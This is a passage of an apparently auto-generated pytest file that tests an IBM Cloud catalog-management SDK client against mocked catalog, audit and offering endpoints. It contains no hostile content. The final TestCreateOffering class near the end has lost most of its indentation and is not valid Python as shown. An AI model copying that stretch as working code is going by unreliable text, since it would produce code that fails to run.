            resource_group_id=resource_group_id,
            owning_account=owning_account,
            catalog_filters=catalog_filters,
            syndication_settings=syndication_settings,
            kind=kind,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 201

        # Validate body params: every field must round-trip unchanged into
        # the serialized request body (note 'rev' serializes as '_rev').
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['id'] == 'testString'
        assert req_body['_rev'] == 'testString'
        assert req_body['label'] == 'testString'
        assert req_body['short_description'] == 'testString'
        assert req_body['catalog_icon_url'] == 'testString'
        assert req_body['tags'] == ['testString']
        assert req_body['features'] == [feature_model]
        assert req_body['disabled'] == True
        assert req_body['resource_group_id'] == 'testString'
        assert req_body['owning_account'] == 'testString'
        assert req_body['catalog_filters'] == filters_model
        assert req_body['syndication_settings'] == syndication_resource_model
        assert req_body['kind'] == 'testString'

    @responses.activate
    def test_create_catalog_required_params(self):
        """
        test_create_catalog_required_params()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs')
        mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=201)

        # Invoke method with no parameters at all (all are optional).
        response = _service.create_catalog()

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 201
class TestGetCatalog():
    """
    Test Class for get_catalog
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in slashes are converted to a regex so the mock matches
        # regardless of how many trailing slashes the client appends.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_catalog_all_params(self):
        """
        get_catalog()
        """
        # Set up mock: GET /catalogs/{catalog_identifier} returns one catalog.
        url = self.preprocess_url(_base_url + '/catalogs/testString')
        mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Invoke method
        response = _service.get_catalog(
            catalog_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_catalog_value_error(self):
        """
        test_get_catalog_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString')
        mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError.
        # ('is not' works here because key and param are the same dict-key
        # objects yielded by the same dict.)
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
        }
        for param in req_param_dict.keys():
            req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_catalog(**req_copy)
class TestReplaceCatalog():
    """
    Test Class for replace_catalog
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in slashes are converted to a regex so the mock matches
        # regardless of how many trailing slashes the client appends.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_replace_catalog_all_params(self):
        """
        replace_catalog()
        """
        # Set up mock: PUT /catalogs/{catalog_identifier} returns the catalog.
        url = self.preprocess_url(_base_url + '/catalogs/testString')
        mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Construct a dict representation of a Feature model
        feature_model = {}
        feature_model['title'] = 'testString'
        feature_model['description'] = 'testString'

        # Construct a dict representation of a FilterTerms model
        filter_terms_model = {}
        filter_terms_model['filter_terms'] = ['testString']

        # Construct a dict representation of a CategoryFilter model
        # NOTE(review): this model is never wired into filters_model below
        # (category_filters is set to {}) — looks like generated dead code.
        category_filter_model = {}
        category_filter_model['include'] = True
        category_filter_model['filter'] = filter_terms_model

        # Construct a dict representation of a IDFilter model
        id_filter_model = {}
        id_filter_model['include'] = filter_terms_model
        id_filter_model['exclude'] = filter_terms_model

        # Construct a dict representation of a Filters model
        filters_model = {}
        filters_model['include_all'] = True
        filters_model['category_filters'] = {}
        filters_model['id_filters'] = id_filter_model

        # Construct a dict representation of a SyndicationCluster model
        syndication_cluster_model = {}
        syndication_cluster_model['region'] = 'testString'
        syndication_cluster_model['id'] = 'testString'
        syndication_cluster_model['name'] = 'testString'
        syndication_cluster_model['resource_group_name'] = 'testString'
        syndication_cluster_model['type'] = 'testString'
        syndication_cluster_model['namespaces'] = ['testString']
        syndication_cluster_model['all_namespaces'] = True

        # Construct a dict representation of a SyndicationHistory model
        syndication_history_model = {}
        syndication_history_model['namespaces'] = ['testString']
        syndication_history_model['clusters'] = [syndication_cluster_model]
        syndication_history_model['last_run'] = "2019-01-01T12:00:00Z"

        # Construct a dict representation of a SyndicationAuthorization model
        syndication_authorization_model = {}
        syndication_authorization_model['token'] = 'testString'
        syndication_authorization_model['last_run'] = "2019-01-01T12:00:00Z"

        # Construct a dict representation of a SyndicationResource model
        syndication_resource_model = {}
        syndication_resource_model['remove_related_components'] = True
        syndication_resource_model['clusters'] = [syndication_cluster_model]
        syndication_resource_model['history'] = syndication_history_model
        syndication_resource_model['authorization'] = syndication_authorization_model

        # Set up parameter values
        catalog_identifier = 'testString'
        id = 'testString'
        rev = 'testString'
        label = 'testString'
        short_description = 'testString'
        catalog_icon_url = 'testString'
        tags = ['testString']
        features = [feature_model]
        disabled = True
        resource_group_id = 'testString'
        owning_account = 'testString'
        catalog_filters = filters_model
        syndication_settings = syndication_resource_model
        kind = 'testString'

        # Invoke method
        response = _service.replace_catalog(
            catalog_identifier,
            id=id,
            rev=rev,
            label=label,
            short_description=short_description,
            catalog_icon_url=catalog_icon_url,
            tags=tags,
            features=features,
            disabled=disabled,
            resource_group_id=resource_group_id,
            owning_account=owning_account,
            catalog_filters=catalog_filters,
            syndication_settings=syndication_settings,
            kind=kind,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate body params: every field must round-trip unchanged into
        # the serialized request body (note 'rev' serializes as '_rev').
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['id'] == 'testString'
        assert req_body['_rev'] == 'testString'
        assert req_body['label'] == 'testString'
        assert req_body['short_description'] == 'testString'
        assert req_body['catalog_icon_url'] == 'testString'
        assert req_body['tags'] == ['testString']
        assert req_body['features'] == [feature_model]
        assert req_body['disabled'] == True
        assert req_body['resource_group_id'] == 'testString'
        assert req_body['owning_account'] == 'testString'
        assert req_body['catalog_filters'] == filters_model
        assert req_body['syndication_settings'] == syndication_resource_model
        assert req_body['kind'] == 'testString'

    @responses.activate
    def test_replace_catalog_required_params(self):
        """
        test_replace_catalog_required_params()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString')
        mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Invoke method with only the required path parameter.
        response = _service.replace_catalog(
            catalog_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_replace_catalog_value_error(self):
        """
        test_replace_catalog_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString')
        mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError.
        # ('is not' works here because key and param are the same dict-key
        # objects yielded by the same dict.)
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
        }
        for param in req_param_dict.keys():
            req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.replace_catalog(**req_copy)
class TestDeleteCatalog():
    """
    Test Class for delete_catalog
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # Match URLs with trailing slashes leniently via a compiled pattern.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_delete_catalog_all_params(self):
        """
        delete_catalog()
        """
        # Register the mocked DELETE endpoint (no response body needed).
        responses.add(
            responses.DELETE,
            self.preprocess_url(_base_url + '/catalogs/testString'),
            status=200,
        )

        # Invoke the operation with the required path parameter.
        catalog_id = 'testString'
        response = _service.delete_catalog(
            catalog_id,
            headers={}
        )

        # Exactly one HTTP call must have been made, answered with 200.
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_delete_catalog_value_error(self):
        """
        test_delete_catalog_value_error()
        """
        # Register the mocked DELETE endpoint.
        responses.add(
            responses.DELETE,
            self.preprocess_url(_base_url + '/catalogs/testString'),
            status=200,
        )

        # Nulling out the single required parameter must raise ValueError.
        required_params = {
            "catalog_identifier": 'testString',
        }
        for missing in required_params:
            call_kwargs = {
                name: (None if name == missing else value)
                for name, value in required_params.items()
            }
            with pytest.raises(ValueError):
                _service.delete_catalog(**call_kwargs)
class TestGetCatalogAudit():
    """
    Test Class for get_catalog_audit
    """

    # Mock audit-log payload shared by both tests below; defined once so the
    # two copies cannot drift apart.
    _mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        Returns the URL unchanged when it has no trailing slash; otherwise
        returns a compiled regex that matches the URL with one or more
        trailing slashes, since `responses` matches such URLs via pattern.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_catalog_audit_all_params(self):
        """
        get_catalog_audit()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/audit')
        responses.add(responses.GET,
                      url,
                      body=self._mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Invoke method
        response = _service.get_catalog_audit(
            catalog_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_catalog_audit_value_error(self):
        """
        test_get_catalog_audit_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/audit')
        responses.add(responses.GET,
                      url,
                      body=self._mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
        }
        for param in req_param_dict.keys():
            # Compare keys by equality, not identity: `is not` on strings
            # relies on CPython interning and is not guaranteed correct.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_catalog_audit(**req_copy)
# endregion
##############################################################################
# End of Service: Catalogs
##############################################################################
##############################################################################
# Start of Service: Offerings
##############################################################################
# region
class TestGetConsumptionOfferings():
    """
    Test Class for get_consumption_offerings
    """

    # Mock offerings-list payload shared by both tests below; defined once so
    # the (very large) copies cannot drift apart.
    _mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}]}'

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        Returns the URL unchanged when it has no trailing slash; otherwise
        returns a compiled regex that matches the URL with one or more
        trailing slashes, since `responses` matches such URLs via pattern.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_consumption_offerings_all_params(self):
        """
        get_consumption_offerings()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/offerings')
        responses.add(responses.GET,
                      url,
                      body=self._mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        digest = True
        catalog = 'testString'
        select = 'all'
        include_hidden = True
        limit = 1000
        offset = 38

        # Invoke method
        response = _service.get_consumption_offerings(
            digest=digest,
            catalog=catalog,
            select=select,
            include_hidden=include_hidden,
            limit=limit,
            offset=offset,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params
        query_string = responses.calls[0].request.url.split('?', 1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'digest={}'.format('true' if digest else 'false') in query_string
        assert 'catalog={}'.format(catalog) in query_string
        assert 'select={}'.format(select) in query_string
        assert 'includeHidden={}'.format('true' if include_hidden else 'false') in query_string
        assert 'limit={}'.format(limit) in query_string
        assert 'offset={}'.format(offset) in query_string

    @responses.activate
    def test_get_consumption_offerings_required_params(self):
        """
        test_get_consumption_offerings_required_params()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/offerings')
        responses.add(responses.GET,
                      url,
                      body=self._mock_response,
                      content_type='application/json',
                      status=200)

        # Invoke method (all parameters of this operation are optional)
        response = _service.get_consumption_offerings()

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200
class TestListOfferings():
    """
    Test Class for list_offerings
    """

    # Mock offerings-list payload shared by all three tests below; defined
    # once so the (very large) copies cannot drift apart.
    _mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}]}'

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        Returns the URL unchanged when it has no trailing slash; otherwise
        returns a compiled regex that matches the URL with one or more
        trailing slashes, since `responses` matches such URLs via pattern.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_list_offerings_all_params(self):
        """
        list_offerings()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
        responses.add(responses.GET,
                      url,
                      body=self._mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        digest = True
        limit = 1000
        offset = 38
        name = 'testString'
        sort = 'testString'

        # Invoke method
        response = _service.list_offerings(
            catalog_identifier,
            digest=digest,
            limit=limit,
            offset=offset,
            name=name,
            sort=sort,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params
        query_string = responses.calls[0].request.url.split('?', 1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'digest={}'.format('true' if digest else 'false') in query_string
        assert 'limit={}'.format(limit) in query_string
        assert 'offset={}'.format(offset) in query_string
        assert 'name={}'.format(name) in query_string
        assert 'sort={}'.format(sort) in query_string

    @responses.activate
    def test_list_offerings_required_params(self):
        """
        test_list_offerings_required_params()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
        responses.add(responses.GET,
                      url,
                      body=self._mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Invoke method
        response = _service.list_offerings(
            catalog_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_list_offerings_value_error(self):
        """
        test_list_offerings_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
        responses.add(responses.GET,
                      url,
                      body=self._mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
        }
        for param in req_param_dict.keys():
            # Compare keys by equality, not identity: `is not` on strings
            # relies on CPython interning and is not guaranteed correct.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.list_offerings(**req_copy)
class TestCreateOffering():
"""
Test Class for create_offering
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_create_offering_all_params(self):
    """
    create_offering()

    Invoke create_offering() with every supported parameter supplied and
    verify each field is serialized into the request body as expected.
    """
